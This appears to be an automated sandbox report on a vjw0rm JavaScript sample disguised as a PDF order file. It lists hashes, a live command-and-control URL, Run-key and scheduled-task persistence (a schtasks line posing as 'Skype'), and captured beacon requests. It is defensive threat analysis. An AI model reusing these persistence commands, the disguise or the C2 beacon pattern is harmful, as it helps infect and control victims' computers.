Analysis
-
max time kernel
134s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
23/10/2023, 14:33 UTC
Static task
static1
Behavioral task
behavioral1
Sample
23102023_2233_Order_1000213789.PDF.js
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
23102023_2233_Order_1000213789.PDF.js
Resource
win10v2004-20231020-en
General
-
Target
23102023_2233_Order_1000213789.PDF.js
-
Size
24KB
-
MD5
1b5fde2efe79bc0ec4d22a1d91760165
-
SHA1
00aa16c286726482769c0ae381ca0a6f5a4a5209
-
SHA256
e991bba3a39d36461d64ed184bead6cb4eba71c1d0091d20d304cb80ab7e5ae5
-
SHA512
17db34f6848ce5f9be41389b6694fa156badb31c6b7e90840c87a9f32b4f7f9394adea664b8de41185458c2098dd6771ab481cc3313167919943f64f37d960ca
-
SSDEEP
384:z3YzEX81ndQeyn3mp0QEXvuJSWK7Zv73IMZKrnM52Q0zBtQ3ogtOhHKTAKDS:DYzEXkda3mtEWJXKNTICKPsntyKTJu
Malware Config
Extracted
vjw0rm
http://severdops.ddns.net:5050
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2520 wscript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\23102023_2233_Order_1000213789.PDF.js wscript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Windows\CurrentVersion\Run\UQHC8JRDD3 = "\"C:\\Users\\Admin\\AppData\\Roaming\\23102023_2233_Order_1000213789.PDF.js\"" wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2864 schtasks.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2520 wrote to memory of 2864 2520 wscript.exe 29 PID 2520 wrote to memory of 2864 2520 wscript.exe 29 PID 2520 wrote to memory of 2864 2520 wscript.exe 29 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\23102023_2233_Order_1000213789.PDF.js1⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\23102023_2233_Order_1000213789.PDF.js2⤵
- Creates scheduled task(s)
PID:2864
-
Network
-
Remote address:8.8.8.8:53Requestseverdops.ddns.netIN AResponseseverdops.ddns.netIN A95.214.27.31
-
Remote address:95.214.27.31:5050RequestPOST /Vre HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: STW_48E58919\URUOZWGF\Admin\Microsoft Windows 7 Ultimate \undefined\\YES\FALSE\
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: severdops.ddns.net:5050
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 23 Oct 2023 14:35:55 GMT
-
Remote address:95.214.27.31:5050RequestPOST /Vre HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: STW_48E58919\URUOZWGF\Admin\Microsoft Windows 7 Ultimate \undefined\\YES\FALSE\
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: severdops.ddns.net:5050
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
820 B 292 B 5 4
HTTP Request
POST http://severdops.ddns.net:5050/VreHTTP Response
200HTTP Request
POST http://severdops.ddns.net:5050/Vre